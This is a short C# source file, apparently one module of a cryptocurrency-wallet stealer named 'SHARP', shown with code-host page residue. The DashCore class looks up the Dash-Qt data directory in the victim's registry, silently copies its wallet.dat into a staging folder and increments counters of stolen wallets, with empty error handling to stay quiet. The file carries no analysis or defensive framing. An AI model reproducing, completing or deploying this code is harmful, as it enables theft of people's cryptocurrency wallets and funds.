24 lines
655 B
C#
24 lines
655 B
C#
using Microsoft.Win32;
|
|||
|
|
using System.IO;
|
||
|
|
|
||
|
|
namespace SHARP
|
||
|
|
{
|
||
|
|
internal class DashCore
|
||
|
|
{
|
||
|
|
public static void DSHcoinStr(string directorypath)
|
||
|
|
{
|
||
|
|
try
|
||
|
|
{
|
||
|
|
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("Software").OpenSubKey("Dash").OpenSubKey("Dash-Qt");
|
||
|
|
Directory.CreateDirectory(directorypath + "\\Wallets\\DashCore\\");
|
||
|
|
File.Copy(registryKey.GetValue("strDataDir").ToString() + "\\wallet.dat", directorypath + "\\DashCore\\wallet.dat");
|
||
|
|
++Counting.dashcore;
|
||
|
|
++Counting.Wallets;
|
||
|
|
}
|
||
|
|
catch
|
||
|
|
{
|
||
|
|
}
|
||
|
|
}
|
||
|
|
}
|
||
|
|
}
|